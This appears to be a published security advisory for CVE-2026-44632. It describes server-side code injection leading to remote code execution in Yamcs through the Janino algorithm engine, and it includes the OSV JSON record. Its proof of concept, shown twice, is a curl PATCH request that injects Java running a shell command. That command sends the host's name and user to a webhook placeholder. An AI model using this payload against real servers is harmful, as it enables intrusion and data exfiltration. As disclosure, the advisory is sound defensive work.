GHSA-524G-X36V-9WM6
Vulnerability from github – Published: 2026-05-27 00:05 – Updated: 2026-05-27 00:05Summary
A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.
Proof of Concept (PoC)
The vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.
Prerequisites:
1. A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime).
2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.
Steps to Reproduce:
- Send an authenticated HTTP
PATCHrequest to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g.,copySunsensor). The payload usesjava.lang.Runtimeto execute a reverse shell or ping an external webhook.
curl -i -X PATCH \
'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \
-H 'Content-Type: application/json' \
-H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
-d '{
"action": "SET",
"algorithm": {
"text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"
}
}'
- Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the
simulator.pyscript to generate sun sensor data). - The Yamcs server uses the Janino
SimpleCompilerto compile the injected text into a Java class on the fly. Since no restrictiveClassLoaderis applied, the payload is successfully compiled and executed. - Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.
Impact
This vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.
Credits
Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.yamcs:yamcs-core"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "5.12.7"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44632"
],
"database_specific": {
"cwe_ids": [
"CWE-94"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T00:05:45Z",
"nvd_published_at": null,
"severity": "CRITICAL"
},
"details": "### Summary\nA Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (`org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory`). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the `ChangeMissionDatabase` privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.\n\n### Proof of Concept (PoC)\nThe vulnerability can be exploited by overriding an existing algorithm\u0027s text via the REST API and injecting a malicious Java payload that executes OS commands.\n\n**Prerequisites:**\n1. A running Yamcs instance with an active processor (e.g., `instance=myproject`, `processor=realtime`).\n2. An active authentication token for a user with the `SystemPrivilege.ChangeMissionDatabase` privilege.\n\n**Steps to Reproduce:**\n\n1. Send an authenticated HTTP `PATCH` request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., `copySunsensor`). The payload uses `java.lang.Runtime` to execute a reverse shell or ping an external webhook.\n\n```bash\ncurl -i -X PATCH \\\n \u0027http://\u003cYAMCS-SERVER-IP\u003e:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor\u0027 \\\n -H \u0027Content-Type: application/json\u0027 \\\n -H \u0027Authorization: Bearer \u003cYOUR_AUTH_TOKEN\u003e\u0027 \\\n -d \u0027{\n \"action\": \"SET\",\n \"algorithm\": {\n \"text\": \"try { java.lang.Runtime.getRuntime().exec(new String[]{\\\"bash\\\", \\\"-c\\\", \\\"curl https://\u003cYOUR-WEBHOOK-URL\u003e/$(hostname)_$(whoami)\\\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);\"\n }\n }\u0027\n```\n\n2. Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the `simulator.py` script to generate sun sensor data).\n3. The Yamcs server uses the Janino `SimpleCompiler` to compile the injected text into a Java class on the fly. Since no restrictive `ClassLoader` is applied, the payload is successfully compiled and executed.\n4. Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.\n\n### Impact\nThis vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.\n\n### Credits\nDiscovered \u0026 reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.",
"id": "GHSA-524g-x36v-9wm6",
"modified": "2026-05-27T00:05:45Z",
"published": "2026-05-27T00:05:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yamcs/yamcs/security/advisories/GHSA-524g-x36v-9wm6"
},
{
"type": "PACKAGE",
"url": "https://github.com/yamcs/yamcs"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Yamcs Vulnerable to Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.